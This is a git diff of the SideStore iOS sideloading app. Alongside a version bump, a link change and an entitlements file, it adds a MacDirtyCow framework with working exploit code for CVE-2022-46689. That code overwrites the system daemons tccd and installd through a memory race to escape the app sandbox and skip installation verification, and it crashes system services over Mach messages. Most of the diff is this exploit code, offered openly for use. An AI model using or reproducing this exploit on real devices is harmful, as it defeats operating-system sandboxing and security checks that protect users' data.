AltWidget/Resources/ReleaseEntitlements.plist

@@ -0,0 +1,16 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+<plist version="1.0">
+<dict>
+	<key>application-identifier</key>
+	<string>XYZ0123456.com.SideStore.SideStore.AltWidget</string>
+	<key>com.apple.developer.team-identifier</key>
+	<string>XYZ0123456</string>
+	<key>com.apple.security.application-groups</key>
+	<array>
+		<string>group.com.SideStore.SideStore</string>
+	</array>
+	<key>get-task-allow</key>
+	<true/>
+</dict>
+</plist>

Build.xcconfig

@@ -1,8 +1,8 @@
 // Configuration settings file format documentation can be found at:
 // https://help.apple.com/xcode/#/dev745c5c974
 
-MARKETING_VERSION = 0.4.0
+MARKETING_VERSION = 0.5.5
-CURRENT_PROJECT_VERSION = 4000
+CURRENT_PROJECT_VERSION = 5050
 
 // Vars to be overwritten by `CodeSigning.xcconfig` if exists
 DEVELOPMENT_TEAM = S32Z3HMYVQ

CONTRIBUTING.md

@@ -7,7 +7,7 @@ There are many ways to contribute to SideStore, so if you aren't a developer, th
 -   [Writing documentation](https://github.com/SideStore/SideStore-Docs)
 -   [Submitting detailed bug reports and suggesting new features](https://github.com/SideStore/SideStore/issues/new/choose)
 -   Helping out with support
-    -   [Discord](https://discord.gg/RgpFBX3Q3k)
+    -   [Discord](https://discord.gg/sidestore-949183273383395328)
     -   [GitHub Discussions](https://github.com/SideStore/SideStore/discussions)
 
 However, this guide will focus on the development side of things. For now, we will only have setup information here, but you can [join our Discord](https://discord.gg/RgpFBX3Q3k) if you need help

MacDirtyCow/MacDirtyCow.h

@@ -0,0 +1,21 @@
+//
+//  MacDirtyCow.h
+//  MacDirtyCow
+//
+//  Created by June P on 2023/11/28.
+//  Copyright © 2023 SideStore. All rights reserved.
+//
+
+#import <Foundation/Foundation.h>
+
+//! Project version number for MacDirtyCow.
+FOUNDATION_EXPORT double MacDirtyCowVersionNumber;
+
+//! Project version string for MacDirtyCow.
+FOUNDATION_EXPORT const unsigned char MacDirtyCowVersionString[];
+
+// In this header, you should import all the public headers of your framework using statements like #import <MacDirtyCow/PublicHeader.h>
+
+#include "grant_full_disk_access.h"
+#include "helpers.h"
+#include "vm_unaligned_copy_switch_race.h"

MacDirtyCow/grant_full_disk_access.h

@@ -0,0 +1,16 @@
+//
+//  grant_full_disk_access.h
+//  AltStore
+//
+//  Created by June P on 2023/11/28.
+//  Copyright © 2023 SideStore. All rights reserved.
+//
+
+#ifndef grant_full_disk_access_h
+#define grant_full_disk_access_h
+@import Foundation;
+
+/// Uses CVE-2022-46689 to grant the current app read/write access outside the sandbox.
+void grant_full_disk_access(void (^_Nonnull completion)(NSError* _Nullable));
+bool patch_installd(void);
+#endif /* grant_full_disk_access_h */

MacDirtyCow/grant_full_disk_access.m

@@ -0,0 +1,618 @@
+//
+//  grant_full_disk_access.m
+//  MacDirtyCow
+//
+//  Created by June P on 2023/11/28.
+//  Copyright © 2023 SideStore. All rights reserved.
+//
+
+@import Darwin;
+@import Foundation;
+@import MachO;
+
+#import <mach-o/fixup-chains.h>
+// you'll need helpers.m from Ian Beer's write_no_write and vm_unaligned_copy_switch_race.m from
+// WDBFontOverwrite
+// Also, set an NSAppleMusicUsageDescription in Info.plist (can be anything)
+// Please don't call this code on iOS 14 or below
+// (This temporarily overwrites tccd, and on iOS 14 and above changes do not revert on reboot)
+#import "grant_full_disk_access.h"
+#import "helpers.h"
+#import "vm_unaligned_copy_switch_race.h"
+
+typedef NSObject* xpc_object_t;
+typedef xpc_object_t xpc_connection_t;
+typedef void (^xpc_handler_t)(xpc_object_t object);
+xpc_object_t xpc_dictionary_create(const char* const _Nonnull* keys,
+                                   xpc_object_t _Nullable const* values, size_t count);
+xpc_connection_t xpc_connection_create_mach_service(const char* name, dispatch_queue_t targetq,
+                                                    uint64_t flags);
+void xpc_connection_set_event_handler(xpc_connection_t connection, xpc_handler_t handler);
+void xpc_connection_resume(xpc_connection_t connection);
+void xpc_connection_send_message_with_reply(xpc_connection_t connection, xpc_object_t message,
+                                            dispatch_queue_t replyq, xpc_handler_t handler);
+xpc_object_t xpc_connection_send_message_with_reply_sync(xpc_connection_t connection,
+                                                         xpc_object_t message);
+xpc_object_t xpc_bool_create(bool value);
+xpc_object_t xpc_string_create(const char* string);
+xpc_object_t xpc_null_create(void);
+const char* xpc_dictionary_get_string(xpc_object_t xdict, const char* key);
+
+int64_t sandbox_extension_consume(const char* token);
+
+// MARK: - patchfind
+
+struct grant_full_disk_access_offsets {
+  uint64_t offset_addr_s_com_apple_tcc_;
+  uint64_t offset_padding_space_for_read_write_string;
+  uint64_t offset_addr_s_kTCCServiceMediaLibrary;
+  uint64_t offset_auth_got__sandbox_init;
+  uint64_t offset_just_return_0;
+  bool is_arm64e;
+};
+
+static bool patchfind_sections(void* executable_map,
+                               struct segment_command_64** data_const_segment_out,
+                               struct symtab_command** symtab_out,
+                               struct dysymtab_command** dysymtab_out) {
+  struct mach_header_64* executable_header = executable_map;
+  struct load_command* load_command = executable_map + sizeof(struct mach_header_64);
+  for (int load_command_index = 0; load_command_index < executable_header->ncmds;
+       load_command_index++) {
+    switch (load_command->cmd) {
+      case LC_SEGMENT_64: {
+        struct segment_command_64* segment = (struct segment_command_64*)load_command;
+        if (strcmp(segment->segname, "__DATA_CONST") == 0) {
+          *data_const_segment_out = segment;
+        }
+        break;
+      }
+      case LC_SYMTAB: {
+        *symtab_out = (struct symtab_command*)load_command;
+        break;
+      }
+      case LC_DYSYMTAB: {
+        *dysymtab_out = (struct dysymtab_command*)load_command;
+        break;
+      }
+    }
+    load_command = ((void*)load_command) + load_command->cmdsize;
+  }
+  return true;
+}
+
+static uint64_t patchfind_get_padding(struct segment_command_64* segment) {
+  struct section_64* section_array = ((void*)segment) + sizeof(struct segment_command_64);
+  struct section_64* last_section = &section_array[segment->nsects - 1];
+  return last_section->offset + last_section->size;
+}
+
+static uint64_t patchfind_pointer_to_string(void* executable_map, size_t executable_length,
+                                            const char* needle) {
+  void* str_offset = memmem(executable_map, executable_length, needle, strlen(needle) + 1);
+  if (!str_offset) {
+    return 0;
+  }
+  uint64_t str_file_offset = str_offset - executable_map;
+  for (int i = 0; i < executable_length; i += 8) {
+    uint64_t val = *(uint64_t*)(executable_map + i);
+    if ((val & 0xfffffffful) == str_file_offset) {
+      return i;
+    }
+  }
+  return 0;
+}
+
+static uint64_t patchfind_return_0(void* executable_map, size_t executable_length) {
+  // TCCDSyncAccessAction::sequencer
+  // mov x0, #0
+  // ret
+  static const char needle[] = {0x00, 0x00, 0x80, 0xd2, 0xc0, 0x03, 0x5f, 0xd6};
+  void* offset = memmem(executable_map, executable_length, needle, sizeof(needle));
+  if (!offset) {
+    return 0;
+  }
+  return offset - executable_map;
+}
+
+static uint64_t patchfind_got(void* executable_map, size_t executable_length,
+                              struct segment_command_64* data_const_segment,
+                              struct symtab_command* symtab_command,
+                              struct dysymtab_command* dysymtab_command,
+                              const char* target_symbol_name) {
+  uint64_t target_symbol_index = 0;
+  for (int sym_index = 0; sym_index < symtab_command->nsyms; sym_index++) {
+    struct nlist_64* sym =
+        ((struct nlist_64*)(executable_map + symtab_command->symoff)) + sym_index;
+    const char* sym_name = executable_map + symtab_command->stroff + sym->n_un.n_strx;
+    if (strcmp(sym_name, target_symbol_name)) {
+      continue;
+    }
+    // printf("%d %llx\n", sym_index, (uint64_t)(((void*)sym) - executable_map));
+    target_symbol_index = sym_index;
+    break;
+  }
+
+  struct section_64* section_array =
+      ((void*)data_const_segment) + sizeof(struct segment_command_64);
+  struct section_64* first_section = &section_array[0];
+  if (!(strcmp(first_section->sectname, "__auth_got") == 0 ||
+        strcmp(first_section->sectname, "__got") == 0)) {
+    return 0;
+  }
+  uint32_t* indirect_table = executable_map + dysymtab_command->indirectsymoff;
+
+  for (int i = 0; i < first_section->size; i += 8) {
+    uint64_t val = *(uint64_t*)(executable_map + first_section->offset + i);
+    uint64_t indirect_table_entry = (val & 0xfffful);
+    if (indirect_table[first_section->reserved1 + indirect_table_entry] == target_symbol_index) {
+      return first_section->offset + i;
+    }
+  }
+  return 0;
+}
+
+static bool patchfind(void* executable_map, size_t executable_length,
+                      struct grant_full_disk_access_offsets* offsets) {
+  struct segment_command_64* data_const_segment = nil;
+  struct symtab_command* symtab_command = nil;
+  struct dysymtab_command* dysymtab_command = nil;
+  if (!patchfind_sections(executable_map, &data_const_segment, &symtab_command,
+                          &dysymtab_command)) {
+    printf("no sections\n");
+    return false;
+  }
+  if ((offsets->offset_addr_s_com_apple_tcc_ =
+           patchfind_pointer_to_string(executable_map, executable_length, "com.apple.tcc.")) == 0) {
+    printf("no com.apple.tcc. string\n");
+    return false;
+  }
+  if ((offsets->offset_padding_space_for_read_write_string =
+           patchfind_get_padding(data_const_segment)) == 0) {
+    printf("no padding\n");
+    return false;
+  }
+  if ((offsets->offset_addr_s_kTCCServiceMediaLibrary = patchfind_pointer_to_string(
+           executable_map, executable_length, "kTCCServiceMediaLibrary")) == 0) {
+    printf("no kTCCServiceMediaLibrary string\n");
+    return false;
+  }
+  if ((offsets->offset_auth_got__sandbox_init =
+           patchfind_got(executable_map, executable_length, data_const_segment, symtab_command,
+                         dysymtab_command, "_sandbox_init")) == 0) {
+    printf("no sandbox_init\n");
+    return false;
+  }
+  if ((offsets->offset_just_return_0 = patchfind_return_0(executable_map, executable_length)) ==
+      0) {
+    printf("no just return 0\n");
+    return false;
+  }
+  struct mach_header_64* executable_header = executable_map;
+  offsets->is_arm64e = (executable_header->cpusubtype & ~CPU_SUBTYPE_MASK) == CPU_SUBTYPE_ARM64E;
+
+  return true;
+}
+
+// MARK: - tccd patching
+
+static void call_tccd(void (^completion)(NSString* _Nullable extension_token)) {
+  // reimplmentation of TCCAccessRequest, as we need to grab and cache the sandbox token so we can
+  // re-use it until next reboot.
+  // Returns the sandbox token if there is one, or nil if there isn't one.
+  xpc_connection_t connection = xpc_connection_create_mach_service(
+      "com.apple.tccd", dispatch_get_global_queue(QOS_CLASS_USER_INITIATED, 0), 0);
+  xpc_connection_set_event_handler(connection, ^(xpc_object_t object) {
+    NSLog(@"xpc event handler: %@", object);
+  });
+  xpc_connection_resume(connection);
+  const char* keys[] = {
+      "TCCD_MSG_ID",  "function",           "service", "require_purpose", "preflight",
+      "target_token", "background_session",
+  };
+  xpc_object_t values[] = {
+      xpc_string_create("17087.1"),
+      xpc_string_create("TCCAccessRequest"),
+      xpc_string_create("com.apple.app-sandbox.read-write"),
+      xpc_null_create(),
+      xpc_bool_create(false),
+      xpc_null_create(),
+      xpc_bool_create(false),
+  };
+  xpc_object_t request_message = xpc_dictionary_create(keys, values, sizeof(keys) / sizeof(*keys));
+#if 0
+  xpc_object_t response_message = xpc_connection_send_message_with_reply_sync(connection, request_message);
+  NSLog(@"%@", response_message);
+
+#endif
+  xpc_connection_send_message_with_reply(
+      connection, request_message, dispatch_get_global_queue(QOS_CLASS_USER_INITIATED, 0),
+      ^(xpc_object_t object) {
+        if (!object) {
+          NSLog(@"object is nil???");
+          completion(nil);
+          return;
+        }
+        NSLog(@"response: %@", object);
+        if ([object isKindOfClass:NSClassFromString(@"OS_xpc_error")]) {
+          NSLog(@"xpc error?");
+          completion(nil);
+          return;
+        }
+        NSLog(@"debug description: %@", [object debugDescription]);
+        const char* extension_string = xpc_dictionary_get_string(object, "extension");
+        NSString* extension_nsstring =
+            extension_string ? [NSString stringWithUTF8String:extension_string] : nil;
+        completion(extension_nsstring);
+      });
+}
+
+static NSData* patchTCCD(void* executableMap, size_t executableLength) {
+  struct grant_full_disk_access_offsets offsets = {};
+  if (!patchfind(executableMap, executableLength, &offsets)) {
+    return nil;
+  }
+
+  NSMutableData* data = [NSMutableData dataWithBytes:executableMap length:executableLength];
+  // strcpy(data.mutableBytes, "com.apple.app-sandbox.read-write", sizeOfStr);
+  char* mutableBytes = data.mutableBytes;
+  {
+    // rewrite com.apple.tcc. into blank string
+    *(uint64_t*)(mutableBytes + offsets.offset_addr_s_com_apple_tcc_ + 8) = 0;
+  }
+  {
+    // make offset_addr_s_kTCCServiceMediaLibrary point to "com.apple.app-sandbox.read-write"
+    // we need to stick this somewhere; just put it in the padding between
+    // the end of __objc_arrayobj and the end of __DATA_CONST
+    strcpy((char*)(data.mutableBytes + offsets.offset_padding_space_for_read_write_string),
+           "com.apple.app-sandbox.read-write");
+    struct dyld_chained_ptr_arm64e_rebase targetRebase =
+        *(struct dyld_chained_ptr_arm64e_rebase*)(mutableBytes +
+                                                  offsets.offset_addr_s_kTCCServiceMediaLibrary);
+    targetRebase.target = offsets.offset_padding_space_for_read_write_string;
+    *(struct dyld_chained_ptr_arm64e_rebase*)(mutableBytes +
+                                              offsets.offset_addr_s_kTCCServiceMediaLibrary) =
+        targetRebase;
+    *(uint64_t*)(mutableBytes + offsets.offset_addr_s_kTCCServiceMediaLibrary + 8) =
+        strlen("com.apple.app-sandbox.read-write");
+  }
+  if (offsets.is_arm64e) {
+    // make sandbox_init call return 0;
+    struct dyld_chained_ptr_arm64e_auth_rebase targetRebase = {
+        .auth = 1,
+        .bind = 0,
+        .next = 1,
+        .key = 0,  // IA
+        .addrDiv = 1,
+        .diversity = 0,
+        .target = offsets.offset_just_return_0,
+    };
+    *(struct dyld_chained_ptr_arm64e_auth_rebase*)(mutableBytes +
+                                                   offsets.offset_auth_got__sandbox_init) =
+        targetRebase;
+  } else {
+    // make sandbox_init call return 0;
+    struct dyld_chained_ptr_64_rebase targetRebase = {
+        .bind = 0,
+        .next = 2,
+        .target = offsets.offset_just_return_0,
+    };
+    *(struct dyld_chained_ptr_64_rebase*)(mutableBytes + offsets.offset_auth_got__sandbox_init) =
+        targetRebase;
+  }
+  return data;
+}
+
+static bool overwrite_file(int fd, NSData* sourceData) {
+  for (int off = 0; off < sourceData.length; off += 0x4000) {
+    bool success = false;
+    for (int i = 0; i < 2; i++) {
+      if (unaligned_copy_switch_race(
+              fd, off, sourceData.bytes + off,
+              off + 0x4000 > sourceData.length ? sourceData.length - off : 0x4000)) {
+        success = true;
+        break;
+      }
+    }
+    if (!success) {
+      return false;
+    }
+  }
+  return true;
+}
+
+static void grant_full_disk_access_impl(void (^completion)(NSString* extension_token,
+                                                           NSError* _Nullable error)) {
+  char* targetPath = "/System/Library/PrivateFrameworks/TCC.framework/Support/tccd";
+  int fd = open(targetPath, O_RDONLY | O_CLOEXEC);
+  if (fd == -1) {
+    // iOS 15.3 and below
+    targetPath = "/System/Library/PrivateFrameworks/TCC.framework/tccd";
+    fd = open(targetPath, O_RDONLY | O_CLOEXEC);
+  }
+  off_t targetLength = lseek(fd, 0, SEEK_END);
+  lseek(fd, 0, SEEK_SET);
+  void* targetMap = mmap(nil, targetLength, PROT_READ, MAP_SHARED, fd, 0);
+
+  NSData* originalData = [NSData dataWithBytes:targetMap length:targetLength];
+  NSData* sourceData = patchTCCD(targetMap, targetLength);
+  if (!sourceData) {
+    completion(nil, [NSError errorWithDomain:@"com.worthdoingbadly.fulldiskaccess"
+                                        code:5
+                                    userInfo:@{NSLocalizedDescriptionKey : @"Can't patchfind."}]);
+    return;
+  }
+
+  if (!overwrite_file(fd, sourceData)) {
+    overwrite_file(fd, originalData);
+    munmap(targetMap, targetLength);
+    completion(
+        nil, [NSError errorWithDomain:@"com.worthdoingbadly.fulldiskaccess"
+                                 code:1
+                             userInfo:@{
+                               NSLocalizedDescriptionKey : @"Can't overwrite file: your device may "
+                                                           @"not be vulnerable to CVE-2022-46689."
+                             }]);
+    return;
+  }
+  munmap(targetMap, targetLength);
+
+  xpc_crasher("com.apple.tccd");
+  sleep(1);
+  call_tccd(^(NSString* _Nullable extension_token) {
+    overwrite_file(fd, originalData);
+    xpc_crasher("com.apple.tccd");
+    NSError* returnError = nil;
+    if (extension_token == nil) {
+      returnError =
+          [NSError errorWithDomain:@"com.worthdoingbadly.fulldiskaccess"
+                              code:2
+                          userInfo:@{
+                            NSLocalizedDescriptionKey : @"tccd did not return an extension token."
+                          }];
+    } else if (![extension_token containsString:@"com.apple.app-sandbox.read-write"]) {
+      returnError = [NSError
+          errorWithDomain:@"com.worthdoingbadly.fulldiskaccess"
+                     code:3
+                 userInfo:@{
+                   NSLocalizedDescriptionKey : @"tccd patch failed: returned a media library token "
+                                               @"instead of an app sandbox token."
+                 }];
+      extension_token = nil;
+    }
+    completion(extension_token, returnError);
+  });
+}
+
+void grant_full_disk_access(void (^completion)(NSError* _Nullable)) {
+  if (!NSClassFromString(@"NSPresentationIntent")) {
+    // class introduced in iOS 15.0.
+    // TODO(zhuowei): maybe check the actual OS version instead?
+    completion([NSError
+        errorWithDomain:@"com.worthdoingbadly.fulldiskaccess"
+                   code:6
+               userInfo:@{
+                 NSLocalizedDescriptionKey :
+                     @"Not supported on iOS 14 and below: on iOS 14 the system partition is not "
+                     @"reverted after reboot, so running this may permanently corrupt tccd."
+               }]);
+    return;
+  }
+  NSURL* documentDirectory = [NSFileManager.defaultManager URLsForDirectory:NSDocumentDirectory
+                                                                  inDomains:NSUserDomainMask][0];
+  NSURL* sourceURL =
+      [documentDirectory URLByAppendingPathComponent:@"full_disk_access_sandbox_token.txt"];
+  NSError* error = nil;
+  NSString* cachedToken = [NSString stringWithContentsOfURL:sourceURL
+                                                   encoding:NSUTF8StringEncoding
+                                                      error:&error];
+  if (cachedToken) {
+    int64_t handle = sandbox_extension_consume(cachedToken.UTF8String);
+    if (handle > 0) {
+      // cached version worked
+      completion(nil);
+      return;
+    }
+  }
+  grant_full_disk_access_impl(^(NSString* extension_token, NSError* _Nullable error) {
+    if (error) {
+      completion(error);
+      return;
+    }
+    int64_t handle = sandbox_extension_consume(extension_token.UTF8String);
+    if (handle <= 0) {
+      completion([NSError
+          errorWithDomain:@"com.worthdoingbadly.fulldiskaccess"
+                     code:4
+                 userInfo:@{NSLocalizedDescriptionKey : @"Failed to consume generated extension"}]);
+      return;
+    }
+    [extension_token writeToURL:sourceURL
+                     atomically:true
+                       encoding:NSUTF8StringEncoding
+                          error:&error];
+    completion(nil);
+  });
+}
+
+/// MARK - installd patch
+
+struct installd_remove_app_limit_offsets {
+  uint64_t offset_objc_method_list_t_MIInstallableBundle;
+  uint64_t offset_objc_class_rw_t_MIInstallableBundle_baseMethods;
+  uint64_t offset_data_const_end_padding;
+  // MIUninstallRecord::supportsSecureCoding
+  uint64_t offset_return_true;
+};
+
+struct installd_remove_app_limit_offsets gAppLimitOffsets = {
+    .offset_objc_method_list_t_MIInstallableBundle = 0x519b0,
+    .offset_objc_class_rw_t_MIInstallableBundle_baseMethods = 0x804e8,
+    .offset_data_const_end_padding = 0x79c38,
+    .offset_return_true = 0x19860,
+};
+
+static uint64_t patchfind_find_class_rw_t_baseMethods(void* executable_map,
+                                                      size_t executable_length,
+                                                      const char* needle) {
+  void* str_offset = memmem(executable_map, executable_length, needle, strlen(needle) + 1);
+  if (!str_offset) {
+    return 0;
+  }
+  uint64_t str_file_offset = str_offset - executable_map;
+  for (int i = 0; i < executable_length - 8; i += 8) {
+    uint64_t val = *(uint64_t*)(executable_map + i);
+    if ((val & 0xfffffffful) != str_file_offset) {
+      continue;
+    }
+    // baseMethods
+    if (*(uint64_t*)(executable_map + i + 8) != 0) {
+      return i + 8;
+    }
+  }
+  return 0;
+}
+
+static uint64_t patchfind_return_true(void* executable_map, size_t executable_length) {
+  // mov w0, #1
+  // ret
+  static const char needle[] = {0x20, 0x00, 0x80, 0x52, 0xc0, 0x03, 0x5f, 0xd6};
+  void* offset = memmem(executable_map, executable_length, needle, sizeof(needle));
+  if (!offset) {
+    return 0;
+  }
+  return offset - executable_map;
+}
+
+static bool patchfind_installd(void* executable_map, size_t executable_length,
+                               struct installd_remove_app_limit_offsets* offsets) {
+  struct segment_command_64* data_const_segment = nil;
+  struct symtab_command* symtab_command = nil;
+  struct dysymtab_command* dysymtab_command = nil;
+  if (!patchfind_sections(executable_map, &data_const_segment, &symtab_command,
+                          &dysymtab_command)) {
+    printf("no sections\n");
+    return false;
+  }
+  if ((offsets->offset_data_const_end_padding = patchfind_get_padding(data_const_segment)) == 0) {
+    printf("no padding\n");
+    return false;
+  }
+  if ((offsets->offset_objc_class_rw_t_MIInstallableBundle_baseMethods =
+           patchfind_find_class_rw_t_baseMethods(executable_map, executable_length,
+                                                 "MIInstallableBundle")) == 0) {
+    printf("no MIInstallableBundle class_rw_t\n");
+    return false;
+  }
+  offsets->offset_objc_method_list_t_MIInstallableBundle =
+      (*(uint64_t*)(executable_map +
+                    offsets->offset_objc_class_rw_t_MIInstallableBundle_baseMethods)) &
+      0xffffffull;
+
+  if ((offsets->offset_return_true = patchfind_return_true(executable_map, executable_length)) ==
+      0) {
+    printf("no return true\n");
+    return false;
+  }
+  return true;
+}
+
+struct objc_method {
+  int32_t name;
+  int32_t types;
+  int32_t imp;
+};
+
+struct objc_method_list {
+  uint32_t entsizeAndFlags;
+  uint32_t count;
+  struct objc_method methods[];
+};
+
+static void patch_copy_objc_method_list(void* mutableBytes, uint64_t old_offset,
+                                        uint64_t new_offset, uint64_t* out_copied_length,
+                                        void (^callback)(const char* sel,
+                                                         uint64_t* inout_function_pointer)) {
+  struct objc_method_list* original_list = mutableBytes + old_offset;
+  struct objc_method_list* new_list = mutableBytes + new_offset;
+  *out_copied_length =
+      sizeof(struct objc_method_list) + original_list->count * sizeof(struct objc_method);
+  new_list->entsizeAndFlags = original_list->entsizeAndFlags;
+  new_list->count = original_list->count;
+  for (int method_index = 0; method_index < original_list->count; method_index++) {
+    struct objc_method* method = &original_list->methods[method_index];
+    // Relative pointers
+    uint64_t name_file_offset = ((uint64_t)(&method->name)) - (uint64_t)mutableBytes + method->name;
+    uint64_t types_file_offset =
+        ((uint64_t)(&method->types)) - (uint64_t)mutableBytes + method->types;
+    uint64_t imp_file_offset = ((uint64_t)(&method->imp)) - (uint64_t)mutableBytes + method->imp;
+    const char* sel = mutableBytes + (*(uint64_t*)(mutableBytes + name_file_offset) & 0xffffffull);
+    callback(sel, &imp_file_offset);
+
+    struct objc_method* new_method = &new_list->methods[method_index];
+    new_method->name = (int32_t)((int64_t)name_file_offset -
+                                 (int64_t)((uint64_t)&new_method->name - (uint64_t)mutableBytes));
+    new_method->types = (int32_t)((int64_t)types_file_offset -
+                                  (int64_t)((uint64_t)&new_method->types - (uint64_t)mutableBytes));
+    new_method->imp = (int32_t)((int64_t)imp_file_offset -
+                                (int64_t)((uint64_t)&new_method->imp - (uint64_t)mutableBytes));
+  }
+};
+
+static NSData* make_patch_installd(void* executableMap, size_t executableLength) {
+  struct installd_remove_app_limit_offsets offsets = {};
+  if (!patchfind_installd(executableMap, executableLength, &offsets)) {
+    return nil;
+  }
+
+  NSMutableData* data = [NSMutableData dataWithBytes:executableMap length:executableLength];
+  char* mutableBytes = data.mutableBytes;
+  uint64_t current_empty_space = offsets.offset_data_const_end_padding;
+  uint64_t copied_size = 0;
+  uint64_t new_method_list_offset = current_empty_space;
+  patch_copy_objc_method_list(mutableBytes, offsets.offset_objc_method_list_t_MIInstallableBundle,
+                              current_empty_space, &copied_size,
+                              ^(const char* sel, uint64_t* inout_address) {
+                                if (strcmp(sel, "performVerificationWithError:") != 0) {
+                                  return;
+                                }
+                                *inout_address = offsets.offset_return_true;
+                              });
+  current_empty_space += copied_size;
+  ((struct
+    dyld_chained_ptr_arm64e_auth_rebase*)(mutableBytes +
+                                          offsets
+                                              .offset_objc_class_rw_t_MIInstallableBundle_baseMethods))
+      ->target = new_method_list_offset;
+  return data;
+}
+
+bool patch_installd() {
+  const char* targetPath = "/usr/libexec/installd";
+  int fd = open(targetPath, O_RDONLY | O_CLOEXEC);
+  off_t targetLength = lseek(fd, 0, SEEK_END);
+  lseek(fd, 0, SEEK_SET);
+  void* targetMap = mmap(nil, targetLength, PROT_READ, MAP_SHARED, fd, 0);
+
+  NSData* originalData = [NSData dataWithBytes:targetMap length:targetLength];
+  NSData* sourceData = make_patch_installd(targetMap, targetLength);
+  if (!sourceData) {
+    NSLog(@"can't patchfind");
+    return false;
+  }
+
+  if (!overwrite_file(fd, sourceData)) {
+    overwrite_file(fd, originalData);
+    munmap(targetMap, targetLength);
+    NSLog(@"can't overwrite");
+    return false;
+  }
+  munmap(targetMap, targetLength);
+  xpc_crasher("com.apple.mobile.installd");
+  sleep(1);
+
+  // TODO(zhuowei): for now we revert it once installd starts
+  // so the change will only last until when this installd exits
+  overwrite_file(fd, originalData);
+  return true;
+}

MacDirtyCow/helpers.h

@@ -0,0 +1,20 @@
+//
+//  helpers.h
+//  AltStore
+//
+//  Created by June P on 2023/11/28.
+//  Copyright © 2023 SideStore. All rights reserved.
+//
+
+#ifndef helpers_h
+#define helpers_h
+
+char* get_temp_file_path(void);
+void test_nsexpressions(void);
+char* set_up_tmp_file(void);
+
+void xpc_crasher(char* service_name);
+
+#define ROUND_DOWN_PAGE(val) (val & ~(PAGE_SIZE - 1ULL))
+
+#endif /* helpers_h */

MacDirtyCow/helpers.m

@@ -0,0 +1,138 @@
+//
+//  helpers.m
+//  MacDirtyCow
+//
+//  Created by June P on 2023/11/28.
+//  Copyright © 2023 SideStore. All rights reserved.
+//
+
+#import <Foundation/Foundation.h>
+#include <string.h>
+#include <mach/mach.h>
+#include <dirent.h>
+
+char* get_temp_file_path(void) {
+  return strdup([[NSTemporaryDirectory() stringByAppendingPathComponent:@"AAAAs"] fileSystemRepresentation]);
+}
+
+// create a read-only test file we can target:
+char* set_up_tmp_file(void) {
+  char* path = get_temp_file_path();
+  printf("path: %s\n", path);
+  
+  FILE* f = fopen(path, "w");
+  if (!f) {
+    printf("opening the tmp file failed...\n");
+    return NULL;
+  }
+  char* buf = malloc(PAGE_SIZE*10);
+  memset(buf, 'A', PAGE_SIZE*10);
+  fwrite(buf, PAGE_SIZE*10, 1, f);
+  //fclose(f);
+  return path;
+}
+
+kern_return_t
+bootstrap_look_up(mach_port_t bp, const char* service_name, mach_port_t *sp);
+
+struct xpc_w00t {
+  mach_msg_header_t hdr;
+  mach_msg_body_t body;
+  mach_msg_port_descriptor_t client_port;
+  mach_msg_port_descriptor_t reply_port;
+};
+
+mach_port_t get_send_once(mach_port_t recv) {
+  mach_port_t so = MACH_PORT_NULL;
+  mach_msg_type_name_t type = 0;
+  kern_return_t err = mach_port_extract_right(mach_task_self(), recv, MACH_MSG_TYPE_MAKE_SEND_ONCE, &so, &type);
+  if (err != KERN_SUCCESS) {
+    printf("port right extraction failed: %s\n", mach_error_string(err));
+    return MACH_PORT_NULL;
+  }
+  printf("made so: 0x%x from recv: 0x%x\n", so, recv);
+  return so;
+}
+
+// copy-pasted from an exploit I wrote in 2019...
+// still works...
+
+// (in the exploit for this: https://googleprojectzero.blogspot.com/2019/04/splitting-atoms-in-xnu.html )
+
+void xpc_crasher(char* service_name) {
+  mach_port_t client_port = MACH_PORT_NULL;
+  mach_port_t reply_port = MACH_PORT_NULL;
+
+  mach_port_t service_port = MACH_PORT_NULL;
+
+  kern_return_t err = bootstrap_look_up(bootstrap_port, service_name, &service_port);
+  if(err != KERN_SUCCESS){
+    printf("unable to look up %s\n", service_name);
+    return;
+  }
+
+  if (service_port == MACH_PORT_NULL) {
+    printf("bad service port\n");
+    return;
+  }
+
+  // allocate the client and reply port:
+  err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &client_port);
+  if (err != KERN_SUCCESS) {
+    printf("port allocation failed: %s\n", mach_error_string(err));
+    return;
+  }
+
+  mach_port_t so0 = get_send_once(client_port);
+  mach_port_t so1 = get_send_once(client_port);
+
+  // insert a send so we maintain the ability to send to this port
+  err = mach_port_insert_right(mach_task_self(), client_port, client_port, MACH_MSG_TYPE_MAKE_SEND);
+  if (err != KERN_SUCCESS) {
+    printf("port right insertion failed: %s\n", mach_error_string(err));
+    return;
+  }
+
+  err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &reply_port);
+  if (err != KERN_SUCCESS) {
+    printf("port allocation failed: %s\n", mach_error_string(err));
+    return;
+  }
+
+  struct xpc_w00t msg;
+  memset(&msg.hdr, 0, sizeof(msg));
+  msg.hdr.msgh_bits = MACH_MSGH_BITS_SET(MACH_MSG_TYPE_COPY_SEND, 0, 0, MACH_MSGH_BITS_COMPLEX);
+  msg.hdr.msgh_size = sizeof(msg);
+  msg.hdr.msgh_remote_port = service_port;
+  msg.hdr.msgh_id   = 'w00t';
+
+  msg.body.msgh_descriptor_count = 2;
+
+  msg.client_port.name        = client_port;
+  msg.client_port.disposition = MACH_MSG_TYPE_MOVE_RECEIVE; // we still keep the send
+  msg.client_port.type        = MACH_MSG_PORT_DESCRIPTOR;
+
+  msg.reply_port.name        = reply_port;
+  msg.reply_port.disposition = MACH_MSG_TYPE_MAKE_SEND;
+  msg.reply_port.type        = MACH_MSG_PORT_DESCRIPTOR;
+
+  err = mach_msg(&msg.hdr,
+                 MACH_SEND_MSG|MACH_MSG_OPTION_NONE,
+                 msg.hdr.msgh_size,
+                 0,
+                 MACH_PORT_NULL,
+                 MACH_MSG_TIMEOUT_NONE,
+                 MACH_PORT_NULL);
+
+  if (err != KERN_SUCCESS) {
+    printf("w00t message send failed: %s\n", mach_error_string(err));
+    return;
+  } else {
+    printf("sent xpc w00t message\n");
+  }
+
+  mach_port_deallocate(mach_task_self(), so0);
+  mach_port_deallocate(mach_task_self(), so1);
+
+  return;
+}

MacDirtyCow/vm_unaligned_copy_switch_race.h

@@ -0,0 +1,20 @@
+//
+//  vm_unaligned_copy_switch_race.h
+//  AltStore
+//
+//  Created by June P on 2023/11/28.
+//  Copyright © 2023 SideStore. All rights reserved.
+//
+
